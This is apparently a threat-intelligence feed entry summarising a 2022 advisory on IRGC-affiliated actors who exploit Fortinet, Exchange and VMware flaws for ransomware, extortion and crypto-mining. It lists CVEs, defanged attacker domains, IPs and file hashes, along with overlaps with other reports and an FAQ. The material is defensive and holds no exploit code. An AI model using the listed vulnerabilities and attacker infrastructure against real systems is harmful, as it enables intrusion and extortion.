Iranian government-sponsored hackers have been breaking into the computer networks of various organizations. They do this by finding and exploiting security flaws in common software. Once inside, they steal data, lock computers to demand a ransom, or use the systems to mine cryptocurrency.

Who was behind the attack?

The attacks are blamed on groups affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC). One specific group identified in the report is an Iranian company called "Afkar System Yazd Company."

What are the goals of the attack?

The main goals appear to be financial gain and disruption. The attackers demand money to unlock data they have encrypted (ransom), threaten to leak stolen information (extortion), or generate cryptocurrency using the victim's electricity and hardware.

Who is being targeted?

The targets are very broad and include critical infrastructure and government services. Victims have included U.S. police departments, transportation companies, aerospace firms, and municipal governments, as well as organizations in the UK and Australia.

How was the attack carried out?

The attackers scan the internet for organizations that haven't updated their software. They specifically look for known "holes" in Microsoft Exchange, Fortinet, and VMware systems. They use these holes to get in, then use other tools to move around the network and lock up files.

Why are these targets attractive to attackers?

These organizations likely hold sensitive data or provide essential services (like transportation or police work). This makes them more likely to feel pressured to pay a ransom to get their systems back online quickly.

What actions should organizations take to protect themselves?

The most important step is to update all software immediately, especially the specific programs mentioned (Microsoft, Fortinet, VMware). Organizations should also keep backup copies of their data offline so they can restore it if their main systems are locked.

Is this a widespread issue?

Yes. The report indicates that these actors have been actively scanning for and exploiting these vulnerabilities since early 2021 across multiple countries and industries.

Threats Feed|Unknown|Last Updated 17/02/2026|AuthorCertfa Radar|Publish Date14/09/2022

Iranian Cyber Actors Target Western Nations in Ransom and Extortion Campaigns

Actor Motivations: Exfiltration,Extortion,Financial Gain
Attack Vectors: Vulnerability Exploitation,Cryptojacking,Ransomware
Attack Complexity: Medium
Threat Risk: High Impact/High Probability

Threat Overview

Iranian Islamic Revolutionary Guard Corps-affiliated cyber actors exploited vulnerabilities in Fortinet FortiOS, Microsoft Exchange, and VMware Horizon applications since early 2021, targeting entities in the U.S., U.K., and Australia. These vulnerabilities, including CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, and several ProxyShell issues, were used for initial access, ransom operations, and data exfiltration. Activities include encrypting data for ransom, extortion operations, and crypto-mining, impacting sectors like law enforcement, transportation, municipal government, and aerospace. The actors leveraged tools like FRP, Plink, RDP, and BitLocker for command and control, lateral movement, and encryption.

Reference and Credit: CISA - September 2022

Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations

Detected Targets

Type	Description	Confidence
Sector	Government Agencies and Services	Verified
Sector	Aerospace	Verified
Sector	Transportation	Verified
Region	Australia	Verified
Region	Canada	Verified
Region	United Kingdom	Verified
Region	United States	Verified

Exploited Vulnerabilities

NIST NVD: CVE-2021-44228

NIST NVD: CVE-2021-45046

NIST NVD: CVE-2021-45105

NIST NVD: CVE-2021-34473

NIST NVD: CVE-2021- 34523

NIST NVD: CVE-2021-31207

NIST NVD: CVE-2021- 31196

NIST NVD: CVE-2021-31206

NIST NVD: CVE-2021-33768

NIST NVD: CVE-2021-33766

NIST NVD: CVE-2021-34470

NIST NVD: CVE-2018-13379

NIST NVD: CVE-2020-12812

NIST NVD: CVE-2019-5591

Extracted IOCs

aptmirror[.]eu
buylap[.]top
gupdate[.]us
mssync[.]one
msupdate[.]top
msupdate[.]us
newdesk[.]top
symantecserver[.]co
tcp443[.]org
upmirror[.]top
winstore[.]us
0f8b592126cc2be0e9967d21c40806bc
298d41f01009c6d6240bc2dc7b769205
2e1e17a443dc713f13f45a9646fc2179
49c71178fa212012d710f11a0e6d1a30
5b646edb1deb6396082b214a1d93691b
5f098b55f94f5a448ca28904a57c0e58
68f58e442fba50b02130eedfc5fe4e5b
7ac4633bf064ebba9666581b776c548f
7fdc2d007ef0c1946f1f637b87f81590
9a3703f9c532ae2ec3025840fa449d4e
bd131ebfc44025a708575587afeebbf3
cacb64bdf648444e66c82f5ce61caf4b
d2f4647a3749d30a35d5a8faff41765e
ee8fd6c565254fe55a104e67cf33eaea
f0be699c8aafc41b25a8fc0974cc4582
0f676bc786db3c44cac4d2d22070fb514b4cb64c
226f0fbb80f7a061947c982ccf33ad65ac03280f
24ed561a1ddbecd170acf1797723e5d3c51c2f5d
27102b416ef5df186bd8b35190c2a4cc4e2fbf37
3a6431169073d61748829c31a9da29123dd61da8
3da45558d8098eb41ed7db5115af5a2c61c543af
524443dd226173d8ba458133b0a4084a172393ef
6bae2d45bbd8c4b0a59ba08892692fe86e596154
6ca62f4244994b5fbb8a46bdfe62aa1c958cebbd
763ca462b2e9821697e63aa48a1734b10d3765ee
76dd6560782b13af3f44286483e157848efc0a4e
8b23b14d8ec4712734a5f6261aed40942c9e0f68
8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee
e75bfc0dd779d9d8ac02798b090989c2f95850dc
12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a
1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e
17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f
559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e
668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0
724d54971c0bba8ff32aeb6044d3b3fd571b13a4c19cada015ea4bcab30cae26
7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b
8aa3530540ba023fb29550643beb00c9c29f81780056e02c5a0d02a1797b9cd9
b04b97e7431925097b3ca4841b8941397b0b88796da512986327ff66426544ca
b8a472f219658a28556bab4d6d109fdf3433b5233a765084c70214c973becbbd
bcc2e4d96e7418a85509382df6609ec9a53b3805effb7ddaed093bdaf949b6ea
c1723fcad56a7f18562d14ff7a1f030191ad61cd4c44ea2b04ad57a7eb5e2837
d14d546070afda086a1c7166eaafd9347a15a32e6be6d5d029064bfa9ecdede7
104[.]168.117.149
107[.]173.231.114
144[.]76.186.88
148[.]251.71.182
172[.]245.26.118
185[.]141.212.131
198[.]12.65.175
198[.]144.189.74
54[.]39.78.148
95[.]217.193.86

download

Tip: 63 related IOCs (10 IP, 11 domain, 0 URL, 0 email, 42 file hash) to this threat have been found.

Overlaps

Ballistic BobcatBallistic Bobcat Exploits Microsoft Exchange Vulnerabilities to Compromise 34 Organizations

Source: ESET - September 2023

Detection (one case): 198[.]144.189.74

APT35APT35's Exploitation of Microsoft Exchange: Targeting Europe, Middle East, and North America

Source: AttackIQ - August 2023

Detection (16 cases): 107[.]173.231.114, 148[.]251.71.182, 0f676bc786db3c44cac4d2d22070fb514b4cb64c, 1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e, 27102b416ef5df186bd8b35190c2a4cc4e2fbf37, 3a6431169073d61748829c31a9da29123dd61da8, 559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e, 5f098b55f94f5a448ca28904a57c0e58, 668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0, 6bae2d45bbd8c4b0a59ba08892692fe86e596154, 7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b, 8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee, 9a3703f9c532ae2ec3025840fa449d4e, cacb64bdf648444e66c82f5ce61caf4b, d2f4647a3749d30a35d5a8faff41765e, f0be699c8aafc41b25a8fc0974cc4582

Cobalt MirageUnveiling the Actors behind COBALT MIRAGE: A Ransomware Incident Analysis

Source: Secureworks - September 2022

Detection (nine cases): 104[.]168.117.149, 148[.]251.71.182, 172[.]245.26.118, gupdate[.]us, mssync[.]one, msupdate[.]top, newdesk[.]top, symantecserver[.]co, upmirror[.]top

PhosphorusStealth in the System: PHOSPHORUS Exploits Exchange Server in Infrastructure Sector Attack

Source: Deep Instinct - June 2022

Detection (17 cases): 107[.]173.231.114, 148[.]251.71.182, 172[.]245.26.118, 198[.]144.189.74, 12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a, 1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e, 17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f, 724d54971c0bba8ff32aeb6044d3b3fd571b13a4c19cada015ea4bcab30cae26, 7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b, 8aa3530540ba023fb29550643beb00c9c29f81780056e02c5a0d02a1797b9cd9, b04b97e7431925097b3ca4841b8941397b0b88796da512986327ff66426544ca, b8a472f219658a28556bab4d6d109fdf3433b5233a765084c70214c973becbbd, aptmirror[.]eu, msupdate[.]us, newdesk[.]top, symantecserver[.]co, tcp443[.]org

Cobalt MirageCOBALT MIRAGE's Exploits: Targeting Israeli and Western Organizations

Source: Secureworks - May 2022

Detection (15 cases): 107[.]173.231.114, 198[.]12.65.175, 0f8b592126cc2be0e9967d21c40806bc, 27102b416ef5df186bd8b35190c2a4cc4e2fbf37, 3da45558d8098eb41ed7db5115af5a2c61c543af, 5f098b55f94f5a448ca28904a57c0e58, 668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0, 724d54971c0bba8ff32aeb6044d3b3fd571b13a4c19cada015ea4bcab30cae26, aptmirror[.]eu, gupdate[.]us, msupdate[.]us, newdesk[.]top, symantecserver[.]co, tcp443[.]org, winstore[.]us

PhosphorusPowerLess Backdoor: Analyzing the Phosphorus Group's Cyber Espionage Tool

Source: Cybereason - February 2022

Detection (one case): 148[.]251.71.182

APT35CharmPower: APT35's Modular Toolset Exploits Log4j Vulnerability

Source: Check Point - January 2022

Detection (one case): 148[.]251.71.182

PhosphorusIranian-backed PHOSPHORUS Exploits Microsoft Exchange Vulnerabilities for Data Encryption

Source: The DFIR Report - November 2021

Detection (two cases): 148[.]251.71.182, 198[.]144.189.74

PhosphorusAutomated Scripts Used in Microsoft Exchange ProxyShell Attack By PHOSPHORUS

Source: The Dfir Report - March 2021

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

Understanding the IRGC-Affiliated Cyber Threat

: Iranian government-sponsored hackers have been breaking into the computer networks of various organizations. They do this by finding and exploiting security flaws in common software. Once inside, they steal data, lock computers to demand a ransom, or use the systems to mine cryptocurrency.
: The attacks are blamed on groups affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC). One specific group identified in the report is an Iranian company called "Afkar System Yazd Company."
: The main goals appear to be financial gain and disruption. The attackers demand money to unlock data they have encrypted (ransom), threaten to leak stolen information (extortion), or generate cryptocurrency using the victim's electricity and hardware.
: The targets are very broad and include critical infrastructure and government services. Victims have included U.S. police departments, transportation companies, aerospace firms, and municipal governments, as well as organizations in the UK and Australia.
: The attackers scan the internet for organizations that haven't updated their software. They specifically look for known "holes" in Microsoft Exchange, Fortinet, and VMware systems. They use these holes to get in, then use other tools to move around the network and lock up files.
: These organizations likely hold sensitive data or provide essential services (like transportation or police work). This makes them more likely to feel pressured to pay a ransom to get their systems back online quickly.
: The most important step is to update all software immediately, especially the specific programs mentioned (Microsoft, Fortinet, VMware). Organizations should also keep backup copies of their data offline so they can restore it if their main systems are locked.
: Yes. The report indicates that these actors have been actively scanning for and exploiting these vulnerabilities since early 2021 across multiple countries and industries.

About Affiliation

Unknown

Associate threats